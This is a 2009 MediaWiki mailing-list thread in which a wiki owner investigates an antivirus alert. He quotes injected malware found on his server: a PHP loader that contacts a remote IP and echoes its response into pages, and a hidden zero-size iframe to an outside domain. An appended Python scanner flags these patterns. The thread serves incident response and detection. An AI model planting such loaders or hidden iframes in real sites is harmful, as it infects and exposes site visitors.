I notice several files that seem to have been modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
    echo '';
} else {
    $post = "u = ".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
    $out = "POST ".$path." HTTP/1.0\r\n";
    $out .= "Host: ".$ip.":".$port."\r\n";
    $out .= "Content-Type: text/html\r\n";
    $out .= "Content-Length: ".strlen($post)."\r\n";
    $out .= "Connection: Close\r\n";
    $out .= "\r\n";
    $out .= $post;
    fwrite($fp, $out);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    $paths = split("\r\n\r\n", $resp);
    echo $paths[1];
}
?>
and this "m-analytics" code was added to an old index page and a Google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m-analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
Tim Ware
HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts
http://www.hyperarts.com
On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:
You seem to also have external content running on there such as m-analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as it's the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware <tim@hyperarts.com> wrote:
I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with : HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
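An added example, not part of the original thread: a small Python scanner that walks a docroot and flags the two patterns reported above, an external iframe with zero width and height, and a PHP file that calls fsockopen while reading the visitor's User-Agent. The function names, the file-extension list and the sample strings are constructed for illustration, and both checks are heuristics that need manual review of every hit.

```python
import os
import re
import sys

# Match whole <iframe ...> tags; attributes are checked separately so order and quoting don't matter.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
# \b keeps "marginwidth=0" / "marginheight=0" from counting as a zero dimension.
ZERO_DIM = {d: re.compile(r"\b%s\s*=\s*[\"']?0(?:px)?[\"'\s>]" % d, re.I)
            for d in ("width", "height")}
SRC = re.compile(r"\bsrc\s*=\s*[\"']?\s*(https?://[^\s\"'>]+)", re.I)
# PHP that opens a raw socket and also reads visitor headers (the foter.php shape).
PHP_SOCKET = re.compile(r"\bfsockopen\s*\(", re.I)
PHP_VISITOR = re.compile(r"\$\s*_SERVER\s*\[\s*[\"']HTTP_USER_AGENT[\"']", re.I)

# Constructed sample inputs (not taken from the thread).
SAMPLE_INFECTED = ('<html><body>Welcome<iframe src="http://tracker.example.invalid/x/?id=1" '
                   'width=0 height=0 frameborder=0 marginwidth=0></iframe></body></html>')
SAMPLE_CLEAN = ('<iframe src="https://maps.example.invalid/embed" width="600" '
                'height="400" marginwidth=0 marginheight=0></iframe>')
SAMPLE_PHP = "<?php $fp = fsockopen($ip, $port); $p = rawurlencode($_SERVER['HTTP_USER_AGENT']); ?>"

def scan_text(text):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    for tag in IFRAME_TAG.findall(text):
        src = SRC.search(tag)
        if src and all(p.search(tag) for p in ZERO_DIM.values()):
            findings.append(("hidden-iframe", src.group(1)))
    if PHP_SOCKET.search(text) and PHP_VISITOR.search(text):
        findings.append(("php-remote-fetch", "fsockopen + HTTP_USER_AGENT"))
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".inc", ".tpl")):
    """Walk root and return {path: findings} for every file with at least one hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if found:
                hits[path] = found
    return hits

if __name__ == "__main__":
    for path, found in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        for kind, detail in found:
            print(f"{path}: {kind}: {detail}")
```

Run it with the docroot as the only argument; comparing the flagged files' modification times against the last known-good deployment helps scope what else was touched.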